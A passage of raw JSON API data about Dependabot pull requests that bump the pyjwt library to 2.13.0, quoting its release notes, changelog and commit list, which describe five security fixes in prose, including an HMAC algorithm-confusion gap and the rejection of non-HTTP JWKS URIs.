changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ccode\u003ev2.13.0 \u0026lt;https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u0026gt;\u003c/code\u003e__\u003c/h2\u003e\n\u003cp\u003eSecurity\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject JWK JSON documents passed as raw HMAC secrets in\n  ``HMACAlgorithm.prepare_key`` to close an algorithm-confusion gap that\n  the existing PEM/SSH guard did not cover. Reported by @aradona91 in\n  `GHSA-xgmm-8j9v-c9wx \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\u0026gt;`__.\n- Bind the JWT header ``alg`` to ``PyJWK.algorithm_name`` during\n  verification so the caller's ``algorithms=[...]`` allow-list cannot be\n  bypassed when decoding with a ``PyJWK`` / ``PyJWKClient`` key. Reported\n  by @sushi-gif in `GHSA-jq35-7prp-9v3f \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\u0026gt;`__.\n- Reject non-``http(s)`` URI schemes in ``PyJWKClient`` so attacker-\n  influenced URIs cannot read local files or reach unintended schemes via\n  urllib's default ``file://`` / ``ftp://`` / ``data:`` handlers. Reported\n  by @KEIJOT in `GHSA-993g-76c3-p5m4 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\u0026gt;`__.\n- Preserve the cached JWK Set on fetch errors in ``PyJWKClient.fetch_data``.\n  The previous ``finally``-block ``put(None)`` pattern cleared the cache\n  on any transient outage, turning one bad JWKS request into application-\n  wide auth failure. Reported by @eddieran in `GHSA-fhv5-28vv-h8m8 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\u0026gt;`__.\n- Skip the unconditional base64 decode of the compact-form payload segment\n  when ``b64=false`` is set in the protected header, and require that\n  segment to be empty (RFC 7515 Appendix F detached form). Closes an\n  unauthenticated DoS amplifier. Reported by @thesmartshadow in\n  `GHSA-w7vc-732c-9m39 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\u0026gt;`__.\n\u003cp\u003eFixed\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject empty HMAC keys outright in ``HMACAlgorithm.prepare_key`` with\n  ``InvalidKeyError`` instead of accepting them with only a warning.\n  Thanks to @SnailSploit and @spartan8806 for independently flagging the\n  footgun.\n- Forward per-call ``options`` (including ``enforce_minimum_key_length``)\n  from ``PyJWT.decode`` through to ``PyJWS._verify_signature`` so the\n  option actually takes effect when set at the call site rather than only\n  on the ``PyJWT`` instance. Thanks to @WLUB for the report.\n- RFC 7797 §3 compliance for ``b64=false``: the encoder now auto-adds\n  ``\u0026amp;quot;b64\u0026amp;quot;`` to the ``crit`` header parameter, and the decoder rejects\n  tokens that set ``b64=false`` without listing it in ``crit``. Thanks to\n  @MachineLearning-Nerd for the report.\n\nChanged\n\u003c/code\u003e\u003c/pre\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ccode\u003e[#1152](https://github.com/jpadilla/pyjwt/issues/1152) \u0026amp;lt;https://github.com/jpadilla/pyjwt/pull/1152\u0026amp;gt;\u003c/code\u003e__\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ccode\u003ev2.12.1 \u0026amp;lt;https://github.com/jpadilla/pyjwt/compare/2.12.0...2.12.1\u0026amp;gt;\u003c/code\u003e__\n\u0026lt;/tr\u0026gt;\u0026lt;/table\u0026gt;\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/7144e4534c34810f4525dc4578a32addd8212cff\"\u003e\u003ccode\u003e7144e45\u003c/code\u003e\u003c/a\u003e Apply ruff format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/d2f4bec4963897c0ef96ef64a875894f2c8542ab\"\u003e\u003ccode\u003ed2f4bec\u003c/code\u003e\u003c/a\u003e Restore \u003ccode\u003ecast()\u003c/code\u003e calls with cross-version \u003ccode\u003etype: ignore\u003c/code\u003e for \u003ccode\u003eprepare_key\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/22f478cebddd8294259c30f037ecb92b0b348774\"\u003e\u003ccode\u003e22f478c\u003c/code\u003e\u003c/a\u003e Remove redundant casts in \u003ccode\u003eRSAAlgorithm.prepare_key\u003c/code\u003e and `ECAlgorithm.prepare...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/95791b1759b8aa4f2203575d344d5c78564cdc81\"\u003e\u003ccode\u003e95791b1\u003c/code\u003e\u003c/a\u003e Bundle security fixes and hardening into 2.13.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/dcc27a9d3182a2349c30b160758785c6ce7a6508\"\u003e\u003ccode\u003edcc27a9\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1155\"\u003e#1155\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/9d08a9a1896845ed8eaf88e6f6ac61e5800c3e7a\"\u003e\u003ccode\u003e9d08a9a\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1146\"\u003e#1146\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/b87c10014d4109f0214fea188d00faaaf8a80e64\"\u003e\u003ccode\u003eb87c100\u003c/code\u003e\u003c/a\u003e Bump codecov/codecov-action from 5 to 6 (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1154\"\u003e#1154\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/40e3147eb5f790d8d041772e5fc00728a176c812\"\u003e\u003ccode\u003e40e3147\u003c/code\u003e\u003c/a\u003e Migrate development extras to dependency groups (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1152\"\u003e#1152\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/a4e1a3d1218b01c5806420b8f16d9308ac4adc30\"\u003e\u003ccode\u003ea4e1a3d\u003c/code\u003e\u003c/a\u003e Add typing_extensions dependency for Python \u0026lt; 3.11 (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1151\"\u003e#1151\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/bd9700cca7f9258fadcc429c1034e508025931f2\"\u003e\u003ccode\u003ebd9700c\u003c/code\u003e\u003c/a\u003e Use PyJWK algorithm when encoding without explicit algorithm (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1148\"\u003e#1148\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.8.0...2.13.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)\n\n\n\u003c/details\u003e","html_url":"https://github.com/HamzaNasiem/bytelytic-clinic-os/pull/18","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/HamzaNasiem%2Fbytelytic-clinic-os/issues/18","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/18/packages"},{"uuid":"4618840857","node_id":"PR_kwDORrCc587kNhse","number":90,"state":"open","title":"chore(deps): Bump pyjwt from 2.12.1 to 2.13.0 in /backend","user":"dependabot[bot]","labels":["Security"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-06-09T04:31:23.000Z","updated_at":"2026-06-09T04:31:24.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): Bump","packages":[{"name":"pyjwt","old_version":"2.12.1","new_version":"2.13.0","repository_url":"https://github.com/jpadilla/pyjwt"}],"path":"/backend","ecosystem":"pip"},"body":"Bumps [pyjwt](https://github.com/jpadilla/pyjwt) from 2.12.1 to 2.13.0.\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/releases\"\u003epyjwt's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.13.0\u003c/h2\u003e\n\u003ch1\u003ePyJWT 2.13.0 — Security Release\u003c/h1\u003e\n\u003cp\u003eThis release bundles five security fixes plus three additional hardening / spec-compliance changes. We recommend all users upgrade.\u003c/p\u003e\n\u003ch2\u003eSecurity\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\"\u003e\u003ccode\u003eGHSA-xgmm-8j9v-c9wx\u003c/code\u003e\u003c/a\u003e — JWK JSON accepted as HMAC secret (algorithm confusion).\u003c/strong\u003e \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e previously rejected PEM- and SSH-formatted asymmetric keys but did not catch a JWK passed as a raw JSON string. In a verifier configured with both symmetric and asymmetric algorithms in \u003ccode\u003ealgorithms=[…]\u003c/code\u003e and a raw-JSON JWK as the key, an attacker could forge HS256 tokens using the JWK text as the HMAC secret. The guard has been extended to reject any JWK-shaped JSON. \u003cem\u003eReported by \u003ca href=\"https://github.com/aradona91\"\u003e\u003ccode\u003e@​aradona91\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\"\u003e\u003ccode\u003eGHSA-jq35-7prp-9v3f\u003c/code\u003e\u003c/a\u003e — Algorithm allow-list bypass with \u003ccode\u003ePyJWK\u003c/code\u003e / \u003ccode\u003ePyJWKClient\u003c/code\u003e.\u003c/strong\u003e When verifying with a \u003ccode\u003ePyJWK\u003c/code\u003e, the caller's \u003ccode\u003ealgorithms=[…]\u003c/code\u003e allow-list was checked against the token header \u003ccode\u003ealg\u003c/code\u003e as a string only; actual verification used the algorithm bound to the \u003ccode\u003ePyJWK\u003c/code\u003e. An attacker who controlled a registered JWKS key could sign with one algorithm and advertise another on the header. PyJWT now requires the token header \u003ccode\u003ealg\u003c/code\u003e to match the \u003ccode\u003ePyJWK\u003c/code\u003e's algorithm before verification. \u003cem\u003eReported by \u003ca href=\"https://github.com/sushi-gif\"\u003e\u003ccode\u003e@​sushi-gif\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\"\u003e\u003ccode\u003eGHSA-w7vc-732c-9m39\u003c/code\u003e\u003c/a\u003e — DoS via base64 decode of unused payload segment when \u003ccode\u003eb64=false\u003c/code\u003e.\u003c/strong\u003e For detached-payload JWS (\u003ccode\u003eb64=false\u003c/code\u003e), the compact-form payload segment was base64-decoded before being discarded in favor of the caller-supplied \u003ccode\u003edetached_payload\u003c/code\u003e. An attacker could inflate the unused segment to force CPU + memory cost without holding a valid signature. The segment is now required to be empty per RFC 7515 Appendix F, and is no longer decoded. \u003cem\u003eReported by \u003ca href=\"https://github.com/thesmartshadow\"\u003e\u003ccode\u003e@​thesmartshadow\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\"\u003e\u003ccode\u003eGHSA-993g-76c3-p5m4\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e accepts non-HTTP(S) URIs.\u003c/strong\u003e \u003ccode\u003ePyJWKClient.fetch_data\u003c/code\u003e passed its URI to \u003ccode\u003eurllib.request.urlopen\u003c/code\u003e, which by default also handles \u003ccode\u003efile://\u003c/code\u003e, \u003ccode\u003eftp://\u003c/code\u003e, and \u003ccode\u003edata:\u003c/code\u003e schemes. An application that fed an attacker-influenced URI into \u003ccode\u003ePyJWKClient\u003c/code\u003e could be coerced into reading local files or reaching other unintended schemes. \u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects any URI whose scheme isn't \u003ccode\u003ehttp\u003c/code\u003e or \u003ccode\u003ehttps\u003c/code\u003e. \u003cem\u003eReported by \u003ca href=\"https://github.com/KEIJOT\"\u003e\u003ccode\u003e@​KEIJOT\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\"\u003e\u003ccode\u003eGHSA-fhv5-28vv-h8m8\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e cache wiped on fetch error.\u003c/strong\u003e A \u003ccode\u003efinally\u003c/code\u003e-block \u003ccode\u003eput(jwk_set=None)\u003c/code\u003e cleared the JWK Set cache whenever a fetch raised, turning a transient JWKS-endpoint outage into application-wide auth failure. The cache write was moved into the success path; transient errors no longer evict valid cached keys. \u003cem\u003eReported by \u003ca href=\"https://github.com/eddieran\"\u003e\u003ccode\u003e@​eddieran\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eFixed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReject empty HMAC keys outright in \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e with \u003ccode\u003eInvalidKeyError\u003c/code\u003e instead of accepting them with only a warning. Defends against the \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e footgun. \u003cem\u003eThanks to \u003ca href=\"https://github.com/SnailSploit\"\u003e\u003ccode\u003e@​SnailSploit\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/spartan8806\"\u003e\u003ccode\u003e@​spartan8806\u003c/code\u003e\u003c/a\u003e for the reports.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003eForward per-call \u003ccode\u003eoptions\u003c/code\u003e (including \u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e) from \u003ccode\u003ePyJWT.decode\u003c/code\u003e through to \u003ccode\u003ePyJWS._verify_signature\u003c/code\u003e. The option was previously silently dropped between the two layers, so it only took effect when set on the \u003ccode\u003ePyJWT\u003c/code\u003e instance. \u003cem\u003eThanks to \u003ca href=\"https://github.com/WLUB\"\u003e\u003ccode\u003e@​WLUB\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eRFC 7797 §3 compliance for \u003ccode\u003eb64=false\u003c/code\u003e:\u003c/strong\u003e the encoder now auto-adds \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e to \u003ccode\u003ecrit\u003c/code\u003e, and the decoder rejects tokens that set \u003ccode\u003eb64=false\u003c/code\u003e without listing it in \u003ccode\u003ecrit\u003c/code\u003e. \u003cem\u003eThanks to \u003ca href=\"https://github.com/MachineLearning-Nerd\"\u003e\u003ccode\u003e@​MachineLearning-Nerd\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eChanged\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups, by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/1152\"\u003e#1152\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eUpgrade notes\u003c/h2\u003e\n\u003cp\u003eMost fixes are invisible to correctly-configured callers. A few behavioral changes you may encounter:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eEmpty HMAC keys now raise.\u003c/strong\u003e If your app passed \u003ccode\u003e\u0026quot;\u0026quot;\u003c/code\u003e or \u003ccode\u003eb\u0026quot;\u0026quot;\u003c/code\u003e as a secret (often via a missing env var, e.g. \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e), \u003ccode\u003eencode\u003c/code\u003e/\u003ccode\u003edecode\u003c/code\u003e will now raise \u003ccode\u003eInvalidKeyError\u003c/code\u003e. This is the intended behavior — fix the configuration.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWK\u003c/code\u003e decoding now requires the token's \u003ccode\u003ealg\u003c/code\u003e to match the JWK's algorithm.\u003c/strong\u003e Previously a mismatch was silently honored if the header \u003ccode\u003ealg\u003c/code\u003e appeared in the allow-list. Tokens that relied on this mismatch will now fail with \u003ccode\u003eInvalidAlgorithmError\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects non-HTTP(S) URIs at construction time.\u003c/strong\u003e Tests or dev environments that fetched JWKS from \u003ccode\u003efile://\u003c/code\u003e URIs need to switch to a local HTTP server or load the JWKS by other means (e.g. construct \u003ccode\u003ePyJWKSet.from_dict(...)\u003c/code\u003e directly).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eb64=false\u003c/code\u003e tokens are now strictly RFC 7515 / 7797 compliant.\u003c/strong\u003e Tokens with a non-empty compact-form payload segment, or that omit \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e from \u003ccode\u003ecrit\u003c/code\u003e, will be rejected. PyJWT-produced tokens always satisfy both invariants, so round-trips through PyJWT are unaffected.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e set per-call now takes effect.\u003c/strong\u003e Callers who passed \u003ccode\u003eoptions={\u0026quot;enforce_minimum_key_length\u0026quot;: True}\u003c/code\u003e to \u003ccode\u003ejwt.decode()\u003c/code\u003e previously got no enforcement; they will now get \u003ccode\u003eInvalidKeyError\u003c/code\u003e on undersized keys, as documented.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull changelog:\u003c/strong\u003e \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\"\u003ehttps://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/blob/master/CHANGELOG.rst\"\u003epyjwt's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ccode\u003ev2.13.0 \u0026lt;https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u0026gt;\u003c/code\u003e__\u003c/h2\u003e\n\u003cp\u003eSecurity\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject JWK JSON documents passed as raw HMAC secrets in\n  ``HMACAlgorithm.prepare_key`` to close an algorithm-confusion gap that\n  the existing PEM/SSH guard did not cover. Reported by @aradona91 in\n  `GHSA-xgmm-8j9v-c9wx \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\u0026gt;`__.\n- Bind the JWT header ``alg`` to ``PyJWK.algorithm_name`` during\n  verification so the caller's ``algorithms=[...]`` allow-list cannot be\n  bypassed when decoding with a ``PyJWK`` / ``PyJWKClient`` key. Reported\n  by @sushi-gif in `GHSA-jq35-7prp-9v3f \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\u0026gt;`__.\n- Reject non-``http(s)`` URI schemes in ``PyJWKClient`` so attacker-\n  influenced URIs cannot read local files or reach unintended schemes via\n  urllib's default ``file://`` / ``ftp://`` / ``data:`` handlers. Reported\n  by @KEIJOT in `GHSA-993g-76c3-p5m4 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\u0026gt;`__.\n- Preserve the cached JWK Set on fetch errors in ``PyJWKClient.fetch_data``.\n  The previous ``finally``-block ``put(None)`` pattern cleared the cache\n  on any transient outage, turning one bad JWKS request into application-\n  wide auth failure. Reported by @eddieran in `GHSA-fhv5-28vv-h8m8 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\u0026gt;`__.\n- Skip the unconditional base64 decode of the compact-form payload segment\n  when ``b64=false`` is set in the protected header, and require that\n  segment to be empty (RFC 7515 Appendix F detached form). Closes an\n  unauthenticated DoS amplifier. Reported by @thesmartshadow in\n  `GHSA-w7vc-732c-9m39 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\u0026gt;`__.\n\u003cp\u003eFixed\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject empty HMAC keys outright in ``HMACAlgorithm.prepare_key`` with\n  ``InvalidKeyError`` instead of accepting them with only a warning.\n  Thanks to @SnailSploit and @spartan8806 for independently flagging the\n  footgun.\n- Forward per-call ``options`` (including ``enforce_minimum_key_length``)\n  from ``PyJWT.decode`` through to ``PyJWS._verify_signature`` so the\n  option actually takes effect when set at the call site rather than only\n  on the ``PyJWT`` instance. Thanks to @WLUB for the report.\n- RFC 7797 §3 compliance for ``b64=false``: the encoder now auto-adds\n  ``\u0026amp;quot;b64\u0026amp;quot;`` to the ``crit`` header parameter, and the decoder rejects\n  tokens that set ``b64=false`` without listing it in ``crit``. Thanks to\n  @MachineLearning-Nerd for the report.\n\nChanged\n\u003c/code\u003e\u003c/pre\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ccode\u003e[#1152](https://github.com/jpadilla/pyjwt/issues/1152) \u0026amp;lt;https://github.com/jpadilla/pyjwt/pull/1152\u0026amp;gt;\u003c/code\u003e__\n\u003c/code\u003e\u003c/pre\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/7144e4534c34810f4525dc4578a32addd8212cff\"\u003e\u003ccode\u003e7144e45\u003c/code\u003e\u003c/a\u003e Apply ruff format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/d2f4bec4963897c0ef96ef64a875894f2c8542ab\"\u003e\u003ccode\u003ed2f4bec\u003c/code\u003e\u003c/a\u003e Restore \u003ccode\u003ecast()\u003c/code\u003e calls with cross-version \u003ccode\u003etype: ignore\u003c/code\u003e for \u003ccode\u003eprepare_key\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/22f478cebddd8294259c30f037ecb92b0b348774\"\u003e\u003ccode\u003e22f478c\u003c/code\u003e\u003c/a\u003e Remove redundant casts in \u003ccode\u003eRSAAlgorithm.prepare_key\u003c/code\u003e and `ECAlgorithm.prepare...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/95791b1759b8aa4f2203575d344d5c78564cdc81\"\u003e\u003ccode\u003e95791b1\u003c/code\u003e\u003c/a\u003e Bundle security fixes and hardening into 2.13.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/dcc27a9d3182a2349c30b160758785c6ce7a6508\"\u003e\u003ccode\u003edcc27a9\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1155\"\u003e#1155\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/9d08a9a1896845ed8eaf88e6f6ac61e5800c3e7a\"\u003e\u003ccode\u003e9d08a9a\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1146\"\u003e#1146\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/b87c10014d4109f0214fea188d00faaaf8a80e64\"\u003e\u003ccode\u003eb87c100\u003c/code\u003e\u003c/a\u003e Bump codecov/codecov-action from 5 to 6 (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1154\"\u003e#1154\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/40e3147eb5f790d8d041772e5fc00728a176c812\"\u003e\u003ccode\u003e40e3147\u003c/code\u003e\u003c/a\u003e Migrate development extras to dependency groups (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1152\"\u003e#1152\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\n[![Dependabot compatibility score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=pyjwt\u0026package-manager=pip\u0026previous-version=2.12.1\u0026new-version=2.13.0)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it 